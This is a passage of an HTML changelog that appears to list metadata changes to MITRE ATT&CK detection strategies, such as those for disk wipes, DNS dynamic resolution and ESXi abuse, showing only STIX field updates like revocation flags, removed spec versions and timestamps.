1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0424] Detection Strategy for Disable or Modify Cloud Firewall</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0289] Detection Strategy for Disable or Modify Cloud Log</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:25:34.812Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0062] Detection Strategy for Disable or Modify Linux Audit System Log</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:25:52.122Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0316] Detection Strategy for Disk Content Wipe via Direct Access and Overwrite</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0297] Detection Strategy for Disk Structure Wipe via Boot/Partition Overwrite</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0137] Detection Strategy for Disk Wipe via Direct Disk Access and Destructive Commands</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0366] Detection Strategy for Double File Extension Masquerading</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0569] Detection Strategy for Downgrade System Image on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0091] Detection Strategy for Dynamic API Resolution via Hash-Based Function Lookups</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0039] Detection Strategy for Dynamic Resolution across OS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0262] Detection Strategy for Dynamic Resolution through DNS Calculation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0419] Detection Strategy for Dynamic Resolution using Domain Generation Algorithms.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0485] Detection Strategy for Dynamic Resolution using Fast Flux DNS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0232] Detection Strategy for ESXi Administration Command</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0558] Detection Strategy for ESXi Hypervisor CLI Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0355] Detection Strategy for Email Bombing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px 